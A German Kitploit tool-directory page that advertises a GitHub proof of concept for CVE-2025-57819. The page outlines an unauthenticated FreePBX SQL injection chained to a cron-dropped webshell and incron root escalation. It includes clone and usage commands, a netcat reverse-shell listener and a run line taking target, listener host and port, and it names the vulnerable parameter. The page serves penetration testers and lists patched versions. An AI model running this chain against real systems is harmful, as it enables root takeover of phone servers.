Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/ozcanpng/cve-2025-57819-freepbx-rce2root
Privilege EscalationSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingPayload-Entwicklung
GitHubozcanpng/cve-2025-57819-freepbx-rce2root

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-57819-FreePBX-RCE2Root

Full-chain CVE-2025-57819 PoC für FreePBX 15, 16 und 17: nicht authentifizierte SQLi zu RCE und Root-Übernahme.

Repository anzeigen
1vor 2 MonatenNoch nicht geprüft

CVE-2025-57819 — FreePBX SQLi → RCE → Root

Full-chain PoC für CVE-2025-57819. Nicht authentifizierte fehlerbasierte SQL-Injection im Endpoint-Modul von FreePBX führt über Cron-Job-Injektion und Incron-Privilege-Eskalation zu einer Root-Shell.

Nur für autorisierte Tests und Forschung. Nicht gegen Systeme verwenden, die dir nicht gehören.


Was es macht

root@kitploit:~
SQLi (EXTRACTVALUE) → INSERT cron job → webshell drop → incron trigger → root shell
  1. Extrahiert DB-Informationen via fehlerbasierte Injection auf /admin/ajax.php
  2. Injiziert einen Cron-Job, der eine PHP-Webshell in das Web-Root schreibt.
  3. Wartet auf Cron-Ausführung (~60s), bestätigt RCE als asterisk
  4. Erstellt eine Incron-Trigger-Datei, die den fwconsole-Hook als root auslöst.
  5. Fängt Reverse-Shell auf deinem Listener ab.

Einrichtung

root@kitploit:~
git clone https://github.com/ozcanpng/CVE-2025-57819-FreePBX-RCE2Root
cd CVE-2025-57819-FreePBX-RCE2Root
pip install -r requirements.txt

Verwendung

root@kitploit:~
python3 CVE-2025-57819.py <target> <lhost> <lport> [--cleanup]

Starte zuerst einen Listener:

root@kitploit:~
nc -lvnp 9999

Dann führe aus:

root@kitploit:~
python3 CVE-2025-57819.py freepbx.example.com 192.168.1.50 9999

--cleanup entfernt die Webshell und den Cron-Job nach der Ausnutzung.


Betroffen

FreePBX mit installiertem endpoint-Modul. Der brand-Parameter in /admin/ajax.php wird unbereinigt in eine SQL-Abfrage übergeben.

FreePBXPatch-Version
15.x15.0.66
16.x16.0.89
17.x17.0.3

Referenzen

  • FreePBX Security Advisory GHSA-m42q-xg4c-5f3h
  • NVD — CVE-2025-57819

Autor

ozcanpng — github.com/ozcanpng — ozcanpng.dev

Tool herunterladen